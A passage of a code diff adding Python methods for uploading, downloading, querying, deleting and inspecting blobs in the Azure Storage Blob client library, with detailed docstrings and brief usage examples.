'source_modified_access_conditions': get_source_conditions(kwargs), + 'cpk_info': cpk_info, + 'cpk_scope_info': get_cpk_scope_info(kwargs) + } + options.update(kwargs) + if not overwrite and not _any_conditions(**options): # pylint: disable=protected-access + options['modified_access_conditions'].if_none_match = '*' + return options + + @distributed_trace + def upload_blob_from_url(self, source_url, **kwargs): + # type: (str, Any) -> Dict[str, Any] + """ + Creates a new Block Blob where the content of the blob is read from a given URL. + The content of an existing blob is overwritten with the new blob. + + :param str source_url: + A URL of up to 2 KB in length that specifies a file or blob. + The value should be URL-encoded as it would appear in a request URI. + If the source is in another account, the source must either be public + or must be authenticated via a shared access signature. If the source + is public, no authentication is required. 
+ Examples: + https://myaccount.blob.core.windows.net/mycontainer/myblob + + https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot= + + https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. + :keyword bool include_source_blob_properties: + Indicates if properties from the source blob should be copied. Defaults to True. + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + :paramtype tags: dict(str, str) + :keyword bytearray source_content_md5: + Specify the md5 that is used to verify the integrity of the source bytes. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. 
If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._upload_blob_from_url_options( + source_url=self._encode_source_url(source_url), + **kwargs) + try: + return self._client.block_blob.put_blob_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def upload_blob( # pylint: disable=too-many-locals + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Any + """Creates a new blob from a data source with automatic chunking. + + :param data: The blob data to upload. + :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be + either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. 
The exception to the above is with Append + blob types: if set to False and the data already exists, an error will not be raised + and the data will be appended to the existing blob. If set overwrite=True, then the existing + append blob will be deleted, and a new one created. Defaults to False. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, upload_blob only succeeds if the + blob's lease is active and matches this ID. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. 
+            Currently this parameter of the upload_blob() API is for BlockBlob only.
+
+            .. versionadded:: 12.10.0
+                This was introduced in API version '2020-10-02'.
+
+        :keyword int maxsize_condition:
+            Optional conditional header. The max length in bytes permitted for
+            the append blob. If the Append Block operation would cause the blob
+            to exceed that limit or if the blob size is already greater than the
+            value specified in this header, the request will fail with
+            MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed).
+        :keyword int max_concurrency:
+            Maximum number of parallel connections to use when the blob size exceeds
+            64MB.
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword str encryption_scope:
+            A predefined encryption scope used to encrypt the data on the service. An encryption
+            scope can be created using the Management API and referenced here by name. If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword str encoding:
+            Encoding to use if text is supplied as input. Defaults to UTF-8.
+        :keyword progress_hook:
+            A callback to track the progress of a long-running upload. The signature is
+            function(current: int, total: Optional[int]) where current is the number of bytes transferred
+            so far, and total is the size of the blob or None if the size is unknown.
+        :paramtype progress_hook: Callable[[int, Optional[int]], None]
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds. This method may make
+            multiple calls to the Azure service and the timeout will apply to
+            each call individually.
+        :returns: Blob-updated property dict (Etag and last modified)
+        :rtype: dict[str, Any]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_hello_world.py
+                :start-after: [START upload_a_blob]
+                :end-before: [END upload_a_blob]
+                :language: python
+                :dedent: 12
+                :caption: Upload a blob to the container.
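+
+            A minimal inline sketch of a typical call, assuming ``blob_client`` is an
+            already-constructed, authenticated BlobClient and the file name is a placeholder:
+
+            .. code-block:: python
+
+                # Upload a local file as a block blob, replacing any existing data.
+                with open("report.csv", "rb") as data:
+                    blob_client.upload_blob(data, overwrite=True)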
+ """ + options = self._upload_blob_options( + data, + blob_type=blob_type, + length=length, + metadata=metadata, + **kwargs) + if blob_type == BlobType.BlockBlob: + return upload_block_blob(**options) + if blob_type == BlobType.PageBlob: + return upload_page_blob(**options) + return upload_append_blob(**options) + + def _download_blob_options(self, offset=None, length=None, **kwargs): + # type: (Optional[int], Optional[int], **Any) -> Dict[str, Any] + if self.require_encryption and not self.key_encryption_key: + raise ValueError("Encryption required but no key was provided.") + if length is not None and offset is None: + raise ValueError("Offset value must not be None if length is set.") + if length is not None: + length = offset + length - 1 # Service actually uses an end-range inclusive index + + validate_content = kwargs.pop('validate_content', False) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'clients': self._client, + 'config': self._config, + 'start_range': offset, + 'end_range': length, + 'version_id': kwargs.pop('version_id', None), + 'validate_content': validate_content, + 'encryption_options': { + 'required': self.require_encryption, + 'key': self.key_encryption_key, + 'resolver': self.key_resolver_function}, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'cls': kwargs.pop('cls', None) or deserialize_blob_stream, + 'max_concurrency':kwargs.pop('max_concurrency', 1), + 'encoding': kwargs.pop('encoding', None), + 'timeout': kwargs.pop('timeout', None), + 'name': self.blob_name, + 'container': self.container_name} + options.update(kwargs) + return options + + @distributed_trace + def download_blob(self, offset=None, length=None, **kwargs): + # type: (Optional[int], Optional[int], **Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an iterator which allows the user to iterate over the content in chunks. + + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. 
Also note that if enabled, the memory-efficient download algorithm
+            will not be used because computing the MD5 hash requires buffering
+            entire blocks, and doing so defeats the purpose of the memory-efficient algorithm.
+        :keyword lease:
+            Required if the blob has an active lease. If specified, download_blob only
+            succeeds if the blob's lease is active and matches this ID. Value can be a
+            BlobLeaseClient object or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+            e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword int max_concurrency:
+            The number of parallel connections with which to download.
+        :keyword str encoding:
+            Encoding to decode the downloaded bytes. Default is None, i.e. no decoding.
+        :keyword progress_hook:
+            A callback to track the progress of a long-running download. The signature is
+            function(current: int, total: int) where current is the number of bytes transferred
+            so far, and total is the total size of the download.
+        :paramtype progress_hook: Callable[[int, int], None]
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds. This method may make
+            multiple calls to the Azure service and the timeout will apply to
+            each call individually.
+        :returns: A streaming object (StorageStreamDownloader)
+        :rtype: ~azure.storage.blob.StorageStreamDownloader
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_hello_world.py
+                :start-after: [START download_a_blob]
+                :end-before: [END download_a_blob]
+                :language: python
+                :dedent: 12
+                :caption: Download a blob.
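+
+            A minimal inline sketch, assuming ``blob_client`` is an already-constructed,
+            authenticated BlobClient and the file name is a placeholder:
+
+            .. code-block:: python
+
+                # Stream the blob into a local file using two parallel connections.
+                downloader = blob_client.download_blob(max_concurrency=2)
+                with open("report.csv", "wb") as handle:
+                    downloader.readinto(handle)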
+ """ + options = self._download_blob_options( + offset=offset, + length=length, + **kwargs) + return StorageStreamDownloader(**options) + + def _quick_query_options(self, query_expression, + **kwargs): + # type: (str, **Any) -> Dict[str, Any] + delimiter = '\n' + input_format = kwargs.pop('blob_format', None) + if input_format == QuickQueryDialect.DelimitedJson: + input_format = DelimitedJsonDialect() + if input_format == QuickQueryDialect.DelimitedText: + input_format = DelimitedTextDialect() + input_parquet_format = input_format == "ParquetDialect" + if input_format and not input_parquet_format: + try: + delimiter = input_format.lineterminator + except AttributeError: + try: + delimiter = input_format.delimiter + except AttributeError: + raise ValueError("The Type of blob_format can only be DelimitedTextDialect or " + "DelimitedJsonDialect or ParquetDialect") + output_format = kwargs.pop('output_format', None) + if output_format == QuickQueryDialect.DelimitedJson: + output_format = DelimitedJsonDialect() + if output_format == QuickQueryDialect.DelimitedText: + output_format = DelimitedTextDialect() + if output_format: + if output_format == "ParquetDialect": + raise ValueError("ParquetDialect is invalid as an output format.") + try: + delimiter = output_format.lineterminator + except AttributeError: + try: + delimiter = output_format.delimiter + except AttributeError: + pass + else: + output_format = input_format if not input_parquet_format else None + query_request = QueryRequest( + expression=query_expression, + input_serialization=serialize_query_format(input_format), + output_serialization=serialize_query_format(output_format) + ) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo( + encryption_key=cpk.key_value, + encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm + ) + options = { + 'query_request': query_request, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'snapshot': self.snapshot, + 'timeout': kwargs.pop('timeout', None), + 'cls': return_headers_and_deserialized, + } + options.update(kwargs) + return options, delimiter + + @distributed_trace + def query_blob(self, query_expression, **kwargs): + # type: (str, **Any) -> BlobQueryReader + """Enables users to select/project on blob/or blob snapshot data by providing simple query expressions. + This operations returns a BlobQueryReader, users need to use readall() or readinto() to get query data. + + :param str query_expression: + Required. a query statement. + :keyword Callable[~azure.storage.blob.BlobQueryError] on_error: + A function to be called on any processing errors returned by the service. + :keyword blob_format: + Optional. Defines the serialization of the data currently stored in the blob. The default is to + treat the blob data as CSV data formatted in the default dialect. This can be overridden with + a custom DelimitedTextDialect, or DelimitedJsonDialect or "ParquetDialect" (passed as a string or enum). 
+            These dialects can be passed through their respective classes, the QuickQueryDialect enum, or as a string.
+        :paramtype blob_format: ~azure.storage.blob.DelimitedTextDialect or ~azure.storage.blob.DelimitedJsonDialect
+            or ~azure.storage.blob.QuickQueryDialect or str
+        :keyword output_format:
+            Optional. Defines the output serialization for the data stream. By default the data will be returned
+            as it is represented in the blob (Parquet formats default to DelimitedTextDialect).
+            By providing an output format, the blob data will be reformatted according to that profile.
+            This value can be a DelimitedTextDialect or a DelimitedJsonDialect or ArrowDialect.
+            These dialects can be passed through their respective classes, the QuickQueryDialect enum, or as a string.
+        :paramtype output_format: ~azure.storage.blob.DelimitedTextDialect or ~azure.storage.blob.DelimitedJsonDialect
+            or list[~azure.storage.blob.ArrowDialect] or ~azure.storage.blob.QuickQueryDialect or str
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blobs with a matching value.
+            e.g. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk:
+            Encrypts the data on the service-side with the given key.
+            Use of customer-provided keys must be done over HTTPS.
+            As the encryption key itself is provided in the request,
+            a secure connection must be established to transfer the key.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: A streaming object (BlobQueryReader)
+        :rtype: ~azure.storage.blob.BlobQueryReader
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_query.py
+                :start-after: [START query]
+                :end-before: [END query]
+                :language: python
+                :dedent: 4
+                :caption: Select/project on blob or blob snapshot data by providing simple query expressions.
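+
+            A minimal inline sketch, assuming ``blob_client`` points at a headerless
+            CSV blob; the query text is illustrative only:
+
+            .. code-block:: python
+
+                # Project the first two columns of a CSV blob.
+                reader = blob_client.query_blob("SELECT _1, _2 FROM BlobStorage")
+                csv_bytes = reader.readall()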
+        """
+        errors = kwargs.pop("on_error", None)
+        error_cls = kwargs.pop("error_cls", BlobQueryError)
+        encoding = kwargs.pop("encoding", None)
+        options, delimiter = self._quick_query_options(query_expression, **kwargs)
+        try:
+            headers, raw_response_body = self._client.blob.query(**options)
+        except HttpResponseError as error:
+            process_storage_error(error)
+        return BlobQueryReader(
+            name=self.blob_name,
+            container=self.container_name,
+            errors=errors,
+            record_delimiter=delimiter,
+            encoding=encoding,
+            headers=headers,
+            response=raw_response_body,
+            error_cls=error_cls)
+
+    @staticmethod
+    def _generic_delete_blob_options(delete_snapshots=None, **kwargs):
+        # type: (str, **Any) -> Dict[str, Any]
+        access_conditions = get_access_conditions(kwargs.pop('lease', None))
+        mod_conditions = get_modify_conditions(kwargs)
+        if delete_snapshots:
+            delete_snapshots = DeleteSnapshotsOptionType(delete_snapshots)
+        options = {
+            'timeout': kwargs.pop('timeout', None),
+            'snapshot': kwargs.pop('snapshot', None),  # this is added for delete_blobs
+            'delete_snapshots': delete_snapshots or None,
+            'lease_access_conditions': access_conditions,
+            'modified_access_conditions': mod_conditions}
+        options.update(kwargs)
+        return options
+
+    def _delete_blob_options(self, delete_snapshots=None, **kwargs):
+        # type: (str, **Any) -> Dict[str, Any]
+        if self.snapshot and delete_snapshots:
+            raise ValueError("The delete_snapshots option cannot be used with a specific snapshot.")
+        options = self._generic_delete_blob_options(delete_snapshots, **kwargs)
+        options['snapshot'] = self.snapshot
+        options['version_id'] = kwargs.pop('version_id', None)
+        options['blob_delete_type'] = kwargs.pop('blob_delete_type', None)
+        return options
+
+    @distributed_trace
+    def delete_blob(self, delete_snapshots=None, **kwargs):
+        # type: (str, **Any) -> None
+        """Marks the specified blob for deletion.
+
+        The blob is later deleted during garbage collection.
+        Note that in order to delete a blob, you must delete all of its
+        snapshots. You can delete both at the same time with the delete_blob()
+        operation.
+
+        If a delete retention policy is enabled for the service, then this operation soft deletes the blob
+        and retains the blob for a specified number of days.
+        After the specified number of days, the blob's data is removed from the service during garbage collection.
+        A soft-deleted blob is accessible through :func:`~ContainerClient.list_blobs()` with the
+        `include=['deleted']` option, and can be restored using the :func:`undelete` operation.
+
+        :param str delete_snapshots:
+            Required if the blob has associated snapshots. Values include:
+             - "only": Deletes only the blob's snapshots.
+             - "include": Deletes the blob along with all snapshots.
+        :keyword str version_id:
+            The version id parameter is an opaque DateTime
+            value that, when present, specifies the version of the blob to delete.
+
+            .. versionadded:: 12.4.0
+            This keyword argument was introduced in API version '2019-12-12'.
+
+        :keyword lease:
+            Required if the blob has an active lease. If specified, delete_blob only
+            succeeds if the blob's lease is active and matches this ID. Value can be a
+            BlobLeaseClient object or the lease ID as a string.
+        :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str
+        :keyword ~datetime.datetime if_modified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only
+            if the resource has been modified since the specified time.
+        :keyword ~datetime.datetime if_unmodified_since:
+            A DateTime value. Azure expects the date value passed in to be UTC.
+            If timezone is included, any non-UTC datetimes will be converted to UTC.
+            If a date is passed in without timezone info, it is assumed to be UTC.
+            Specify this header to perform the operation only if
+            the resource has not been modified since the specified date/time.
+        :keyword str etag:
+            An ETag value, or the wildcard character (*). Used to check if the resource has changed,
+            and act according to the condition specified by the `match_condition` parameter.
+        :keyword ~azure.core.MatchConditions match_condition:
+            The match condition to use upon the etag.
+        :keyword str if_tags_match_condition:
+            Specify a SQL where clause on blob tags to operate only on blob with a matching value.
+            eg. ``\"\\\"tagname\\\"='my tag'\"``
+
+            .. versionadded:: 12.4.0
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :rtype: None
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_hello_world.py
+                :start-after: [START delete_blob]
+                :end-before: [END delete_blob]
+                :language: python
+                :dedent: 12
+                :caption: Delete a blob.
+        """
+        options = self._delete_blob_options(delete_snapshots=delete_snapshots, **kwargs)
+        try:
+            self._client.blob.delete(**options)
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace
+    def undelete_blob(self, **kwargs):
+        # type: (**Any) -> None
+        """Restores soft-deleted blobs or snapshots.
+
+        The operation will only be successful if used within the specified number of days
+        set in the delete retention policy.
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :rtype: None
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_common.py
+                :start-after: [START undelete_blob]
+                :end-before: [END undelete_blob]
+                :language: python
+                :dedent: 8
+                :caption: Undeleting a blob.
+        """
+        try:
+            self._client.blob.undelete(timeout=kwargs.pop('timeout', None), **kwargs)
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace()
+    def exists(self, **kwargs):
+        # type: (**Any) -> bool
+        """
+        Returns True if a blob exists with the defined parameters, and returns
+        False otherwise.
+
+        :keyword str version_id:
+            The version id parameter is an opaque DateTime
+            value that, when present, specifies the version of the blob to check for existence.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: True if the blob exists, False otherwise.
+        :rtype: bool
+        """
+        try:
+            self._client.blob.get_properties(
+                snapshot=self.snapshot,
+                **kwargs)
+            return True
+        except ResourceExistsError:
+            # A blob encrypted with a customer-provided key (CPK) cannot have its
+            # properties read without the key, but the error still proves it exists.
+            return True
+        except HttpResponseError as error:
+            try:
+                process_storage_error(error)
+            except ResourceNotFoundError:
+                return False
+
+    @distributed_trace
+    def get_blob_properties(self, **kwargs):
+        # type: (**Any) -> BlobProperties
+        """Returns all user-defined metadata, standard HTTP properties, and
+        system properties for the blob. It does not return the content of the blob.
+
+        :keyword lease:
+            Required if the blob has an active lease. Value can be a BlobLeaseClient object
+            or the lease ID as a string.
+ :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to get properties. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: BlobProperties + :rtype: ~azure.storage.blob.BlobProperties + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START get_blob_properties] + :end-before: [END get_blob_properties] + :language: python + :dedent: 8 + :caption: Getting the properties for a blob. 
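+
+        A minimal inline sketch (``blob_client`` is assumed to be an existing
+        BlobClient; the attribute names are those of ~azure.storage.blob.BlobProperties)::
+
+            props = blob_client.get_blob_properties()
+            print(props.size, props.last_modified, props.metadata)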
+ """ + # TODO: extract this out as _get_blob_properties_options + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + try: + cls_method = kwargs.pop('cls', None) + if cls_method: + kwargs['cls'] = partial(deserialize_pipeline_response_into_cls, cls_method) + blob_props = self._client.blob.get_properties( + timeout=kwargs.pop('timeout', None), + version_id=kwargs.pop('version_id', None), + snapshot=self.snapshot, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=kwargs.pop('cls', None) or deserialize_blob_properties, + cpk_info=cpk_info, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + blob_props.name = self.blob_name + if isinstance(blob_props, BlobProperties): + blob_props.container = self.container_name + blob_props.snapshot = self.snapshot + return blob_props # type: ignore + + def _set_http_headers_options(self, content_settings=None, **kwargs): + # type: (Optional[ContentSettings], **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + blob_headers = None + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + 